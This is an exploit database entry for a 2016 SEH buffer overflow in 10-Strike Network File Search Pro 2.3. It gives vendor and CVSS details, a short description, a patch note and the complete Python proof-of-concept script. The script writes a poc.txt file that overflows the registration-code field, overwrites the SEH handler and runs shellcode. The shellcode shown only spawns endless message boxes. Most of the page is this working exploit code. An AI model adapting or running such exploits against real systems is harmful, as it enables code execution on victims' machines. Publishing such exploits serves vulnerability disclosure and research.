header-logo
Suggest Exploit
vendor:
Network File Search Pro
by:
malwrforensics
7,8
CVSS
HIGH
SEH exploit
119
CWE
Product Name: Network File Search Pro
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: YES
Related CWE: N/A
CPE: a:10-strike:network_file_search_pro:2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2016

10-Strike Network File Search Pro 2.3 Registration code SEH exploit

This exploit is for 10-Strike Network File Search Pro 2.3. It is a SEH exploit which uses a buffer overflow to overwrite the SEH handler. The exploit code creates a file called poc.txt which contains a buffer of 0xfe0 bytes followed by shellcode, junk, a jump instruction and a nseh instruction. When the poc.txt file is opened in the application, the SEH handler is overwritten and the shellcode is executed.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################

def write_poc(fname, buffer):
	fhandle = open(fname , 'wb')
	fhandle.write(buffer)
	fhandle.close()

fname="poc.txt"
buf = '\x41' * 0xfe0

#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")

junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)

Navigation

Suggest Exploit

Services By CQR